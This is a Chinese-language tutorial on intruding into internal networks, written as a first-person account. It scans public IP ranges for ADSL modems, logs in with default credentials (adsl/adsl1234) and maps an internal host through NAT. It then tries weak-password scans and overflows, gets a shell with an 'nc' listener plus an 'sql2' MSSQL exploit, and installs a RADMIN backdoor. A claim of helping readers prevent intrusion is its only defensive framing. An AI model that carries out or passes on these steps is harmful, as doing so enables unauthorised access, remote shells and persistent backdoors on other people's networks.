内网入侵步骤
网络的应用越来越普及,网络安全隐患也越来越严重,我们来学习学习内网的入侵过程,以便更好的阻止网络入侵。内网入侵步骤如下:
第一、扫描
很多ADSL MODEM都是通过端口80、21、23来进行管理的,但有很多服务器80、21端口都开着,没什么特征性,这里我选择了23端口,打开扫描器,填上我电脑的的IP地址段,(当然你可以设置更大的ip段来扫描)稍等,扫描结果出来了,开23端口的主机还真多。我几台出来,在浏览器那里输入IP:222.xxx.xxx.xxx,OK。登陆对话框出来了,输入USER:ADSL pass:adsl1234(因为我这里的adsl modem一般是华硕的,缺省是adsl adsl1234)bingle 一矢中的,现在我就是上帝。
第二、映射
入侵已经成功了一半,要进一步入侵内网,我们要进行端口映射,但是我连内网的拓扑,都不知道(更不用说内网主机的端口开放情况了)又怎么映射呢?一般来说,MODEM的内网缺省IP是192.168.1.1,而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192.168.1.2的端口映射出来就行了(但如果使用了dhcp就麻烦了)。但是192.168.1.2到底开放了什么端口,我们根本就不知道啊,怎么办呢?呵呵,既然不知道,那么我就把他整台主机透明地映射到外网,做法如下:进入NAT选项---添加NAT规则---BAMID---填入主机IP:192.168.1.2,到此192.168.1.2已经透明地映射到192.168.1.1上了,我们直接访问ADSL MODEM就可以访问主机192.168.1.2了。
第三、检测漏洞
现在我们再请出SUPPERSCAN(扫描器)对222.xxx.xxx.xxx进行扫描,扫描结果已经不同了,开放1433、139等端口,刚才只扫描到了80、21、23端口,说明我们的映射已经成功了。该是X-SCAN出场了,用它来扫弱口令,但这次扫描的结果让人失望,一个弱口令也没有,看来管理员还不算低zs啊。
第四、溢出
既然没弱口令,也没开80端口,那只好从溢出方面着手了,但没开21、80端口,webdav .sevr-u的溢出也就没戏了,很自然,我想到了RPC溢出,但实践证明RPC溢出也不行,LSASS溢出也没戏 。
第五、“募然回首,那人却在,灯火阑珊处”
看来这个管理员还真是负责,该打的补丁都打上了。这时,我的目光转移到1433上了(嘿,不知道他打了SQL补丁没有?),心动不如行动,现在只好死马当活马医了,于是
nc -v -l 99
sql2 222.xxx.xxx.xxx 0 222.xxx.xxx.xxx 99
bingle 成功地得到一个shell了。
第六、设置后门
我们的入侵已经成功了,接下来的就是扫尾留后门来。至于后门,我一般都是用FTP上传RADMIN上去的,呵呵,不懂了就百度、谷歌下咯。
关键词:内网入侵步骤